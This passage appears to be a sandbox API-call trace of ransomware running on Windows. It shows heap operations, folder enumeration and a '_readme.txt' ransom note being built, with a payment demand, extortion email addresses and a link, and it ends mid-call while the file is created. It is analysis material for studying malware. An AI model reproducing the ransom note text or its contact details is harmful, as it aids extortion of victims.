(in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.279] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0180.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.280] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.280] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.280] PathFindFileNameW (pszPath="") returned="" [0180.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.280] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.281] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.281] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0180.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.282] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x2ac3dd0 [0180.283] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0180.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.283] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0180.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.283] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.284] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.284] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 